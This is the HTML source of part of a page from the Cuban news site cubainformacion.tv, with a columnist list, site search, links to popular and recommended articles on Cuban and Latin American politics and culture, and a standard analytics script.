<td width="97%" align="left" bgcolor="#999999" background="http://www.cubainformacion.tv/templates/portcub/images/yes.gif"><a href="/index.php/la-columna/218-norelys-morales"><span style="font-size: small;"><strong>Norelys Morales</strong></span></a></td>
</tr>
<tr>
<td width="3%" bordercolor="#000000"><img src="/images/stories/2012fotos/02trimabrmayjun/iconaut/manuel.gif" border="0" width="50" height="51" style="border: 0pt none;" /></td>
<td width="97%" align="left" bgcolor="#999999" background="http://www.cubainformacion.tv/templates/portcub/images/yes.gif"><a href="/index.php/la-columna/225-manuel-e-yepe"><span style="font-size: small;"><strong>Manuel E. Yepe</strong></span></a></td>
</tr>
<tr>
<td width="3%" bordercolor="#000000"><img src="/images/stories/2012fotos/02trimabrmayjun/iconaut/octavio.gif" border="0" width="50" height="51" style="border: 0pt none;" /></td>
<td width="97%" align="left" bgcolor="#999999" background="http://www.cubainformacion.tv/templates/portcub/images/yes.gif"><a href="/index.php/la-columna/242-octavio-fraga"><span style="font-size: small;"><strong>Octavio Fraga</strong></span></a></td>
</tr>
<tr>
<td width="3%" bordercolor="#000000"><img src="/images/stories/2012fotos/02trimabrmayjun/iconaut/osmany.gif" border="0" width="50" height="51" style="border: 0pt none;" /></td>
<td width="97%" align="left" bgcolor="#999999" background="http://www.cubainformacion.tv/templates/portcub/images/yes.gif"><a href="/index.php/la-columna/239-osmany"><span style="font-size: small;"><strong>Osmany Sánchez Roque (La Joven Cuba)</strong></span></a></td>
</tr>
<tr>
<td width="3%" bordercolor="#000000"><img src="/images/stories/2012fotos/02trimabrmayjun/iconaut/orestes.gif" border="0" width="50" height="51" style="border: 0pt none;" /></td>
<td width="97%" align="left" bgcolor="#999999" background="http://www.cubainformacion.tv/templates/portcub/images/yes.gif"><a href="/index.php/la-columna/227-orestes-marti"><span style="font-size: small;"><strong>Orestes Martí</strong></span></a></td>
</tr>
<tr>
<td width="3%" bordercolor="#000000"><img src="/images/stories/2012fotos/02trimabrmayjun/iconaut/ramon.gif" border="0" width="50" height="51" style="border: 0pt none;" /></td>
<td width="97%" align="left" bgcolor="#999999" background="http://www.cubainformacion.tv/templates/portcub/images/yes.gif"><a href="/index.php/la-columna/265-ramon-pedregal"><span style="font-size: small;"><strong>Ramón Pedregal</strong></span></a></td>
</tr>
<tr>
<td width="3%" bordercolor="#000000"><img src="/images/stories/2012fotos/02trimabrmayjun/iconaut/rob.gif" border="0" width="50" height="51" style="border: 0px none;" /></td>
<td width="97%" align="left" bgcolor="#999999" background="http://www.cubainformacion.tv/templates/portcub/images/yes.gif"><a href="/index.php/la-columna/238-roberto-peralo-la-joven-cuba"><span style="font-size: small;"><strong>Roberto Peralo (La Joven Cuba)</strong></span></a></td>
</tr>
<tr>
<td width="3%" bordercolor="#000000"><img src="/images/stories/2012fotos/02trimabrmayjun/iconaut/salim.gif" border="0" width="50" height="51" style="border: 0pt none;" /></td>
<td width="97%" align="left" bgcolor="#999999" background="http://www.cubainformacion.tv/templates/portcub/images/yes.gif"><a href="/index.php/la-columna/213-salim-lamrani"><span style="font-size: small;"><strong>Salim Lamrani</strong></span></a></td>
</tr>
<tr>
<td width="3%" bordercolor="#000000"><img src="/images/stories/2012fotos/02trimabrmayjun/iconaut/sandra.gif" border="0" width="50" height="51" style="border: 0pt none;" /></td>
<td width="97%" align="left" bgcolor="#999999" background="http://www.cubainformacion.tv/templates/portcub/images/yes.gif"><a href="/index.php/la-columna/229-sandra-alvarez"><span style="font-size: small;"><strong>Sandra Abd'Allah-Alvarez Ramírez (Negra cubana)</strong></span></a></td>
</tr>
<tr>
<td width="3%" bordercolor="#000000"><img src="/images/stories/2012fotos/02trimabrmayjun/iconaut/sheyla.gif" border="0" width="50" height="51" style="border: 0pt none;" /></td>
<td width="97%" align="left" bgcolor="#999999" background="http://www.cubainformacion.tv/templates/portcub/images/yes.gif"><a href="/index.php/la-columna/263-sheyla-delgado-guerra"><span style="font-size: small;"><strong>Sheyla Delgado Guerra</strong></span></a></td>
</tr>
<tr>
<td width="3%" bordercolor="#000000"><img src="/images/stories/2012fotos/02trimabrmayjun/iconaut/sonia.gif" border="0" width="50" height="51" style="border: 0pt none;" /></td>
<td width="97%" align="left" bgcolor="#999999" background="http://www.cubainformacion.tv/templates/portcub/images/yes.gif"><a href="/index.php/la-columna/264-sonia-salanueva"><span style="font-size: small;"><strong>Sonia Salanueva</strong></span></a></td>
</tr>
<tr>
<td width="3%" bordercolor="#000000"><img src="/images/stories/2012fotos/02trimabrmayjun/iconaut/vicenzo.gif" border="0" width="50" height="51" style="border: 0pt none;" /></td>
<td width="97%" align="left" bgcolor="#999999" background="http://www.cubainformacion.tv/templates/portcub/images/yes.gif"><a href="/index.php/la-columna/223-vincenzo-basile"><span style="font-size: small;"><strong>Vincenzo Basile</strong></span></a></td>
</tr>
<tr>
<td width="3%" bordercolor="#000000"><img src="/images/stories/2012fotos/02trimabrmayjun/iconaut/yohan.gif" border="0" width="50" height="51" style="border: 0pt none;" /></td>
<td width="97%" align="left" bgcolor="#999999" background="http://www.cubainformacion.tv/templates/portcub/images/yes.gif"><a href="/index.php/la-columna/244-yohan-gonzalez-duany-desde-mi-insula"><span style="font-size: small;"><strong>Yohan González Duany (Desde mi Ínsula) </strong></span></a></td>
</tr>
</tbody>
</table>		</div>
	</div> 
						<!---- AQUI TERMINA EL FILTRO -->
						
												<!---- AQUI TERMINA EL FILTRO -->
                        
                        
                        
                         <!---- AQUI COMIENZA EL FILTRO -->
												<!---- AQUI TERMINA EL FILTRO -->
                         
                         
                         
                         			<div class="moduletable">
					<!-- SiteSearch Google -->
<form method="get" action="http://www.google.com/custom" target="_top">
        <input type="text" style="border:1px solid #dfdfdf;font-size:12px;width:270px;height:20px;" name="q" size="14" maxlength="255" value="Buscar..." onfocus="this.select()" />
        <input type="submit" style="border:none;background-image: url('/modules/mod_gsearch/tmpl/gsearch.gif');height:23px;width:20px;" value=""/>

        <input type="hidden" name="domains" value="cubainformacion.tv" />
        <input type="hidden" name="sitesearch" value="cubainformacion.tv" id="ss1" />
        <input type="hidden" name="client" value="pub-2914600261958472" />
        <input type="hidden" name="forid" value="1" />
        <input type="hidden" name="ie" value="UTF-8" />
        <input type="hidden" name="oe" value="UTF-8" />

        <input type="hidden" name="safe" value="active" />
        <input type="hidden" name="cof" value="GALT:#008000;GL:1;DIV:#336699;VLC:663399;AH:center;BGC:FFFFFF;LBGC:336699;ALC:0000FF;LC:0000FF;T:000000;GFNT:0000FF;GIMP:0000FF;LH:50;LW:234;L:http://cubainformacion.tv/images/joomla_logo_black.jpg;S:http://cubainformacion.tv;FORID:1" />
        <input type="hidden" name="hl" value="es" />
</form>
<!-- End SiteSearch Google -->		</div>
	
                            
                              <!---- AQUI COMIENZA EL FILTRO -->
												<!---- AQUI TERMINA EL FILTRO -->
                        
                        
                        
                        
                        
                         
                         <table>
                         <tr>
                         <td>
                         
                           <!---- AQUI COMIENZA EL FILTRO -->
												<!---- AQUI TERMINA EL FILTRO -->
                         
                         
                            </td>
                            </tr>
                            </table>
                        
                        
                      
                        
                      
                        
                        
                        
                       
                        
                         
                        
						
					
                         
                       
                        <div class="masle">
                                                 
                                                  <!---- AQUI COMIENZA EL FILTRO -->
						
					   <div class="masleidostyle">
                        		<div class="moduletable">
					<dl class="tabs" id="myPane"><dt id="panel1"><span>Revista</span></dt><dd>		<div class="modulenada">
			<div>
				<div>
					<div>
											<table border="0" align="center">
<tbody>
<tr>
<td style="text-align: center;"><a href="http://cubainformacion.tv/index.php/revista-pagina/76920-donald-trump-contra-cuba-y-venezuela-regresan-los-halcones-cubainformacion-en-papel-otono-2017-no38" target="_blank"><img src="/images/stories/2012fotos/03trimjulagosep/news.jpg" border="0" style="border: 0px;" /></a></td>
</tr>
<tr>
<td style="text-align: center;"><strong><a href="/index.php/revista-pagina/67037-un-ano-de-dialogo-cuba-eeuu-contra-el-bloqueo-obama-si-quiere-puede-cubainformacion-en-papel-invierno-2016-no-33"> </a></strong></td>
</tr>
</tbody>
</table>					</div>
				</div>
			</div>
		</div>
	</dd><dt id="panel2"><span>Lo + leido</span></dt><dd>		<div class="module">
			<div>
				<div>
					<div>
											

<div id="masleidor">

<ul class="masleidosty">
	<li class="masleidosty">
		<a href="/index.php/america-latina/77065-ni-con-las-preguntas-que-no-se-atrevio-hacer-a-mariano-rajoy-jordi-evole-saco-a-nicolas-maduro-de-sus-casillasa" class="masleidosty">
			`Ni con las preguntas que no se atrevió hacer a Mariano Rajoy, Jordi Évole sacó a Nicolás Maduro de sus casillas´</a>
	</li>
	<li class="masleidosty">
		<a href="/index.php/contratuit/77019-historico-la-disidenciaa-legitima-la-democracia-cubana-" class="masleidosty">
			Histórico: la `disidencia´ legitima la democracia cubana </a>
	</li>
	<li class="masleidosty">
		<a href="/index.php/objetivo-falsimedia/76897--eeuu-y-sus-satelites-amenazan-militarmente-a-venezuela-desde-la-amazonia-ise-habian-enterado" class="masleidosty">
			 EEUU y sus satélites amenazan militarmente a Venezuela desde la Amazonía: ¿se habían enterado?</a>
	</li>
	<li class="masleidosty">
		<a href="/index.php/mesa-de-radio/77025-ique-esconden-los-papeles-sobre-kennedy-que-no-han-querido-desclasificar-por-seguridad-nacionala-" class="masleidosty">
			¿Qué esconden los papeles sobre Kennedy que no han querido desclasificar por `seguridad nacional´? </a>
	</li>
	<li class="masleidosty">
		<a href="/index.php/internacionalismo-cubano/77064-oscar-lopez-rivera-vengo-a-dar-mi-agradecimiento-y-mi-amor-al-pueblo-y-gobierno-de-cubaa-fotos" class="masleidosty">
			Oscar López Rivera: `Vengo a traer mi agradecimiento y mi amor al pueblo y gobierno de Cuba´ (+ Fotos)</a>
	</li>
	<li class="masleidosty">
		<a href="/index.php/politica/77043-otro-muro-en-las-relaciones-de-estados-unidos-con-cuba" class="masleidosty">
			Otro muro en las relaciones de Estados Unidos con Cuba</a>
	</li>
	<li class="masleidosty">
		<a href="/index.php/america-latina/77045-presentacion-de-venezuela-la-oscura-causaa-en-el-parlamento-europeo-22-de-noviembre" class="masleidosty">
			Presentación de `Venezuela: la oscura causa´ en el Parlamento Europeo: 22 de noviembre</a>
	</li>
	<li class="masleidosty">
		<a href="/index.php/america-latina/77066-javier-couso-rompo-una-lanza-por-maduro-y-su-lucha-por-el-socialismo" class="masleidosty">
			Javier Couso: `Rompo una lanza por Maduro y su lucha por el socialismo´ (programa Fort Apache)</a>
	</li>
	<li class="masleidosty">
		<a href="/index.php/mesa-de-radio/77024-inversion-extranjera-en-cuba-primeras-metas-cumplidas-y-desafios-burocraticos-" class="masleidosty">
			Inversión extranjera en Cuba: primeras metas cumplidas y desafíos burocráticos </a>
	</li>
	<li class="masleidosty">
		<a href="/index.php/solidaridad-con-cuba/77060-una-noche-magica-de-poesia-bilinguee-improvisada-oihana-bartra-y-alexis-diaz-pimienta-en-bilbao-fotos" class="masleidosty">
			Una noche mágica de poesía bilingüe improvisada: Oihana Bartra y Alexis Díaz-Pimienta en Bilbao (+ Fotos)</a>
	</li>
</ul>
</div>
					</div>
				</div>
			</div>
		</div>
	</dd><dt id="panel3"><span>Recomendamos</span></dt><dd>		<div class="module">
			<div>
				<div>
					<div>
											<ul>
<li><a href="/index.php/lecciones-de-manipulacion/49557-escandalo-de-corrupcion-en-las-damas-de-blanco-empana-premio-del-parlamento-europeo-dotado-con-50000-euros-exclusiva-en-video-de-cubainformacion-tv">Escándalo de corrupción en las Damas de Blanco empaña premio del Parlamento europeo dotado con 50.000 euros. Exclusiva en video de Cubainformación TV</a></li>
<li><a href="/index.php/especiales/otros-especiales/notinews-pagina">Notinews, esqueches de humor sobre manipulación contra Cuba, con Willy Toledo</a></li>
<li><a href="/index.php/cultura/48524-josu-trueba-fotografo-4-anos-retratando-el-punk-en-cuba">Josu Trueba, fotógrafo: 4 años retratando el punk en Cuba</a></li>
<li><a href="/index.php/solidaridad-con-cuba/47735-cubainformacion-y-rap-politico-pablo-hasel-y-los-chikos-del-maiz">Cubainformación y rap político: Pablo Hasel y Los Chikos del Maíz</a></li>
<li><a href="/index.php/genero/47364-voces-de-la-madre-tierra-mujeres-cubanas-y-vascas-protagonistas-de-la-soberania-alimentaria">Voces de la madre tierra: mujeres cubanas y vascas, protagonistas de la soberanía alimentaria</a></li>
<li><a href="/index.php/emigracion/46241-reportaje-del-vii-encuentro-europeo-de-la-emigracion-cubana-un-si-a-la-reforma-migratoria-y-un-si-a-la-revolucion">Reportaje del VII Encuentro Europeo de la Emigración cubana: un sí a la reforma migratoria y un sí a la Revolución (+Fotos)</a></li>
<li><a href="/index.php/solidaridad-con-cuba/44222-la-crisis-capitalista-reafirma-la-solidaridad-con-la-revolucion-cubana-reportaje-del-encuentro-solidaridad-con-cuba-en-toledo">La crisis capitalista reafirma la solidaridad con la Revolución cubana (reportaje del Encuentro Solidaridad con Cuba en Toledo)</a></li>
<li><a href="/index.php/sociedad/28267-agricultura-urbana-icomo-surge-parte-1" target="_blank">Agricultura urbana en Cuba, ejemplo para el mundo (5 videos)</a></li>
<li><a href="/index.php/sociedad/43230-centro-martin-luther-king-de-la-habana-educacion-popular-para-sentir-y-pensar-el-socialismo">Centro Martin Luther King de La Habana: Educación popular para sentir y pensar el socialismo</a></li>
<li><a href="/index.php/cultura/43224-callejon-de-hamel-la-habana-un-templo-de-la-cultura-negra-en-la-via-publica">Callejón de Hamel (La Habana): un templo de la cultura negra en la vía pública</a></li>
<li><a href="/index.php/sociedad/28372-cuba-camino-a-la-soberania-alimentaria">Cuba: camino a la soberanía alimentaria</a></li>
<li><a href="/index.php/cultura/40957-editorial-cuadernos-papiro-holguin-cuba-libros-arte-con-papel-a-mano-y-maquinas-del-siglo-xviii-y-xix">Editorial Cuadernos Papiro (Holguín, Cuba): libros-arte con papel a mano y máquinas del siglo XVIII y XIX</a></li>
<li><a href="/index.php/cultura/40956-centenares-de-artistas-de-cuba-y-del-mundo-piden-la-libertad-del-pintor-agustin-bejarano-preso-en-miam">Centenares de artistas de Cuba y del mundo piden la libertad del pintor Agustín Bejarano, preso en Miami</a></li>
<li><a href="http://cubainformacion.tv/index.php/cultura/40529-33o-festival-del-nuevo-cine-latinoamericano-de-la-habana-el-festival-de-cine-mas-popular">33º Festival del Nuevo Cine Latinoamericano de La Habana: el festival de cine más popular</a></li>
<li><a href="/index.php/cultura/32306-la-jiribilla-centro-de-la-resistencia-cultural-de-cuba">La Jiribilla: centro de la resistencia cultural de Cuba</a> </li>
<li><a href="/index.php/cultura/32451-visita-al-centro-cultural-pablo-de-la-torriente-brau">Visita al centro cultural Pablo de la Torriente Brau</a> </li>
<li><a href="/index.php/cultura/32258-festival-de-cine-pobre-de-gibara-humberto-solas">Festival de Cine Pobre de Gibara Humberto Solas</a> </li>
<li><a href="http://cubainformacion.tv/index.php/emigracion/42836-qla-emigracion-cubana-con-la-revolucionq-promo-vii-encuentro-de-cubanos-y-cubanas-en-europa-madrid-octubre-2012">"La emigración cubana, con la Revolución". Promo VII Encuentro de Cubanos y cubanas en Europa (Madrid, octubre 2012)</a> </li>
<li><a href="/index.php/politica/26470-elecciones-en-cuba-desde-dentro-y-con-todo-detalle-parte-1">Elecciones en Cuba, desde dentro y con todo detalle (2 videos)</a> </li>
<li><a href="/index.php/politica/26486-primero-de-mayo-en-cuba-iun-pueblo-obligado-o-definitivamente-liberado">Primero de mayo en Cuba: ¿un pueblo obligado o definitivamente liberado?</a> </li>
<li><a href="/index.php/otros-especiales/quitando-mascaras/10858-zoe-valdes-el-negocio-del-fascismo-parte-1-apologia-del-dictador-batista">Zoé Valdés: el negocio del fascismo (3 videos)</a> </li>
<li><a href="/index.php/otros-especiales/dicen-que-en-cuba/1631-ien-cuba-se-persigue-la-homosexualidad">¿En Cuba se persigue la homosexualidad?</a> </li>
<li><a href="/index.php/politica/26466-cuba-revolucion-socialista-joven-y-sin-cortes">Cuba: Revolución socialista, joven y sin cortes</a></li>
</ul>					</div>
				</div>
			</div>
		</div>
	</dd></dl>		</div>
	</div> 
						<!---- AQUI TERMINA EL FILTRO -->
						
						                       </div>
                        
                                                   
                        
                        
					</td>
                    </div>
									</tr>
			</table>
		</div>      
              
              
              
                               
                   
												<div class="clr" id="section2">
			<table class="sections" cellspacing="0" cellpadding="0">
				<tr valign="top">
															<td class="section w99">
								<div class="moduletable">
					<table style="width: 950px;" border="0" cellspacing="5" align="center">
<tbody>
<tr>
<td style="text-align: center;" width="25" height="25"><img src="/images/stories/icons/facebook.png" border="0" alt="Facebook" title="Facebook" width="25" height="25" /></td>
<td width="93"><a href="http://www.facebook.com/cubainformacion" target="_blank"><strong>Facebook </strong></a><br /></td>
<td width="25" height="25"><img src="/images/stories/icons/twitter.png" border="0" alt="Twitter" title="Twitter" width="25" height="25" style="border: 0pt none;" /></td>
<td width="83"><a href="http://twitter.com/#!/cubainformacion" target="_blank"><strong>Twitter</strong></a></td>
<td width="25" height="25"><img src="/images/stories/icons/youtube.png" border="0" alt="You Tube" title="You Tube" width="25" height="25" style="border: 0pt none;" /></td>
<td width="83"><strong><a href="http://www.youtube.com/user/CubainformacionTV" target="_blank">You Tube</a></strong><br /></td>
<td width="25"><img src="/images/stories/icons/rss.png" border="0" alt="RSS" title="RSS" width="25" height="25" style="border: 0pt none;" /></td>
<td width="83"><a href="/index.php/pagina-principal?format=feed&amp;type=rss" target="_blank"><strong>RSS</strong></a></td>
<td width="25"><img src="/images/stories/icons/issuu.png" border="0" alt="Issuu" title="Issuu" width="25" height="25" style="border: 0pt none;" /></td>
<td width="83"><a href="http://issuu.com/cubainformacion" target="_blank"><strong>Issuu</strong></a></td>
<td width="25"><img src="/images/stories/icons/daily.png" border="0" alt="Daily Motion" title="Daily Motion" width="25" height="25" style="border: 0pt none;" /></td>
<td width="83"><strong><a href="http://www.dailymotion.com/CubainformacionTV#videoId=xlvc91" target="_blank">Daily Motion</a></strong><br /></td>
<td width="25"><img src="/images/stories/icons/vimeo.png" border="0" alt="Vimeo" title="vimeo" width="25" height="25" style="border: 0pt none;" /></td>
<td width="83"><a href="http://vimeo.com/user2688383" target="_blank"><strong>Vimeo</strong></a></td>
<td width="25"><img src="/images/stories/icons/blip.png" border="0" alt="Bilp.tv" title="Blip.tv" width="25" height="25" style="border: 0pt none;" /></td>
<td width="83"><a href="http://pinterest.com/cubainformacion/" target="_blank"> <strong>Pinterest</strong></a></td>
<td width="25"><img src="/images/stories/icons/paper.png" border="0" alt="Bilp.tv" title="Blip.tv" width="25" height="25" style="border: 0pt none;" /></td>
<td width="83"><a href="https://paper.li/VirgilioPonce/1389124925" target="_blank"> <strong>Paper.li</strong></a></td>
</tr>
</tbody>
</table>		</div>
	
					</td>
														</tr>
			</table>
		</div>
				<div id="footer">
		
					<div id="the-footer">
                    <!---- AQUI COMIENZA EL FILTRO -->
						                       <!---- AQUI COMIENZA EL FILTRO -->
						
					   <div class="infocub">
                        		<div class="moduletable">
					<table style="width: 950px;" border="0" cellspacing="5" align="center">
<tbody>
<tr>
<td width="100"><a href="/index.php/ique-somos">¿Qué somos?</a><br /></td>
<td width="3" height="25"><img src="/images/stories/icons/blobla.png" border="0" style="border: 0pt none;" /></td>
<td width="100"><a href="/index.php/participa-y-contacta"><strong>Contacta</strong></a></td>
<td width="3" height="25"><img src="/images/stories/icons/blobla.png" border="0" width="3" height="24" style="border: 0pt none;" /></td>
<td width="100"><a href="/index.php/agenda"><strong>Agenda</strong></a><br /></td>
<td width="3"><img src="/images/stories/icons/blobla.png" border="0" width="3" height="24" style="border: 0pt none;" /></td>
<td width="100"><a href="/index.php/component/content/article/772-banners-cunas-y-promos"><strong>Banners y promos</strong></a></td>
<td width="3"><img src="/images/stories/icons/blobla.png" border="0" width="3" height="24" style="border: 0pt none;" /></td>
<td width="100"><a href="/index.php/concursos" target="_parent"><strong>Concursos</strong></a></td>
<td width="3"><img src="/images/stories/icons/blobla.png" border="0" width="3" height="24" style="border: 0pt none;" /></td>
<td width="100"><a href="/index.php/enlaces-web-amigas/"><strong>Enlaces</strong></a><br /></td>
</tr>
<tr>
<td colspan="11">
<p style="text-align: center;"><a href="/index.php"><img src="/images/stories/2011 Fotos/bottom-rocket.png" border="0" /></a></p>
<br /></td>
</tr>
</tbody>
</table>		</div>
	</div> 
						<!---- AQUI TERMINA EL FILTRO -->
						
												<!---- AQUI TERMINA EL FILTRO -->
                        <br/>
                      
                        <div class="nounder">                  
                    	
                        </div>
                      
					</div>
                    
                    
                    
                    
                    
				</div>
	</div>


			<script type="text/javascript">
			var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
			document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
			</script>
			<script type="text/javascript">
			try {
			var pageTracker = _gat._getTracker("UA-5974449-1");
			pageTracker._trackPageview();
			} catch(err) {}</script>
			</body>
</html>
